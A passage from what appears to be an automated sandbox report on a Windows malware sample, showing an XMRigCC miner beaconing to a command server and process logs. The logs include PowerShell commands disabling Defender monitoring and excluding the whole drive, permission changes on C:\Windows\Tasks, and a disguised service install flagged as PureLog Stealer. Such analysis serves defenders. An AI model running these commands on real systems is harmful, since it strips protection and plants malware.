                                                                                                                                                                                                  Host: 185.17.0.139:8081
                                                                                                                                                                                                  User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                                                                                                                                                                                  Dec 8, 2024 23:05:35.809159994 CET282INHTTP/1.1 200 OK
                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  21192.168.2.450035185.17.0.13980812044C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:05:44.391530991 CET307OUTPOST /client/setClientStatus?clientId=124406 HTTP/1.1
                                                                                                                                                                                                  Accept: *//*
                                                                                                                                                                                                  Accept: application/json
                                                                                                                                                                                                  Authorization: Bearer mySecret
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 1058
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Host: 185.17.0.139:8081
                                                                                                                                                                                                  User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                                                                                                                                                                                  Dec 8, 2024 23:05:45.800101042 CET282INHTTP/1.1 200 OK
                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  22192.168.2.450038185.17.0.13980812044C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:05:54.332360029 CET307OUTPOST /client/setClientStatus?clientId=124406 HTTP/1.1
                                                                                                                                                                                                  Accept: *//*
                                                                                                                                                                                                  Accept: application/json
                                                                                                                                                                                                  Authorization: Bearer mySecret
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 1058
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Host: 185.17.0.139:8081
                                                                                                                                                                                                  User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                                                                                                                                                                                  Dec 8, 2024 23:05:55.716797113 CET282INHTTP/1.1 200 OK
                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  23192.168.2.450040185.17.0.13980812044C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:06:04.599438906 CET307OUTPOST /client/setClientStatus?clientId=124406 HTTP/1.1
                                                                                                                                                                                                  Accept: *//*
                                                                                                                                                                                                  Accept: application/json
                                                                                                                                                                                                  Authorization: Bearer mySecret
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 1057
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Host: 185.17.0.139:8081
                                                                                                                                                                                                  User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                                                                                                                                                                                  Dec 8, 2024 23:06:05.945744038 CET334INHTTP/1.1 200 OK
                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer
                                                                                                                                                                                                  Data Raw: 7b 22 63 6f 6e 74 72 6f 6c 5f 63 6f 6d 6d 61 6e 64 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 53 54 41 52 54 22 2c 22 70 61 79 6c 6f 61 64 22 3a 22 22 7d 7d
                                                                                                                                                                                                  Data Ascii: {"control_command":{"command":"START","payload":""}}


                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                  Start time:17:01:57
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Users\user\Desktop\IYXE4Uz61k.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\IYXE4Uz61k.exe"
                                                                                                                                                                                                  Imagebase:0x870000
                                                                                                                                                                                                  File size:50'529'184 bytes
                                                                                                                                                                                                  MD5 hash:0C1CB4CC583AABC07F0482F7E0767ECF
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                  Start time:17:01:57
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True
                                                                                                                                                                                                  Imagebase:0x960000
                                                                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                  Start time:17:01:57
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                  Start time:17:02:00
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\
                                                                                                                                                                                                  Imagebase:0x960000
                                                                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                  Start time:17:02:00
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                  Start time:17:02:05
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" "
                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                  Start time:17:02:05
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                  Start time:17:02:05
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"
                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                  Start time:17:02:05
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                  Start time:17:02:05
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:chcp 65001
                                                                                                                                                                                                  Imagebase:0xe00000
                                                                                                                                                                                                  File size:12'800 bytes
                                                                                                                                                                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                  Start time:17:02:05
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq Superfetch.exe"
                                                                                                                                                                                                  Imagebase:0xc70000
                                                                                                                                                                                                  File size:79'360 bytes
                                                                                                                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                  Start time:17:02:05
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:find /I /N "Superfetch.exe"
                                                                                                                                                                                                  Imagebase:0xba0000
                                                                                                                                                                                                  File size:14'848 bytes
                                                                                                                                                                                                  MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                  Start time:17:02:05
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:takeown /f c:\windows\tasks
                                                                                                                                                                                                  Imagebase:0xb90000
                                                                                                                                                                                                  File size:51'712 bytes
                                                                                                                                                                                                  MD5 hash:A9AB2877AE82A53F5A387B045BF326A4
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                  Start time:17:02:05
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:TIMEOUT /T 3 /NOBREAK
                                                                                                                                                                                                  Imagebase:0xad0000
                                                                                                                                                                                                  File size:25'088 bytes
                                                                                                                                                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                  Start time:17:02:08
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:powershell Set-MpPreference -DisableRealtimeMonitoring $True
                                                                                                                                                                                                  Imagebase:0x960000
                                                                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                  Start time:17:02:09
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:powershell Set-MpPreference -ExclusionPath c:\
                                                                                                                                                                                                  Imagebase:0x960000
                                                                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                  Start time:17:02:11
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
                                                                                                                                                                                                  Imagebase:0xbb0000
                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                  MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                  Start time:17:02:11
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
                                                                                                                                                                                                  Imagebase:0xbb0000
                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                  MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                  Start time:17:02:11
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
                                                                                                                                                                                                  Imagebase:0xbb0000
                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                  MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                  Start time:17:02:11
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
                                                                                                                                                                                                  Imagebase:0xbb0000
                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                  MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                  Start time:17:02:11
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)"
                                                                                                                                                                                                  Imagebase:0xbb0000
                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                  MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                  Start time:17:02:11
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)"
                                                                                                                                                                                                  Imagebase:0xbb0000
                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                  MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                  Start time:17:02:11
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
                                                                                                                                                                                                  Imagebase:0xbb0000
                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                  MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                  Start time:17:02:11
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:TIMEOUT /T 3 /NOBREAK
                                                                                                                                                                                                  Imagebase:0xad0000
                                                                                                                                                                                                  File size:25'088 bytes
                                                                                                                                                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                  Start time:17:02:14
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\ProgramData\migrate.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:c:\programdata\migrate.exe -p4432
                                                                                                                                                                                                  Imagebase:0x110000
                                                                                                                                                                                                  File size:50'263'358 bytes
                                                                                                                                                                                                  MD5 hash:20737946FC89B9DB44F82EAE5AD41ACB
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000003.1862977285.00000000093AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 8%, ReversingLabs
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                  Start time:17:02:17
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" "
                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                  Start time:17:02:17
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                  Start time:17:02:17
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:TIMEOUT /T 3 /NOBREAK
                                                                                                                                                                                                  Imagebase:0xad0000
                                                                                                                                                                                                  File size:25'088 bytes
                                                                                                                                                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                  Start time:17:02:18
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:TIMEOUT /T 1 /NOBREAK
                                                                                                                                                                                                  Imagebase:0xad0000
                                                                                                                                                                                                  File size:25'088 bytes
                                                                                                                                                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                                  Start time:17:02:19
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\Tasks\Wmiic.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe
                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                  File size:373'760 bytes
                                                                                                                                                                                                  MD5 hash:A18BFE142F059FDB5C041A310339D4FD
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 74%, ReversingLabs
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                                  Start time:17:02:19
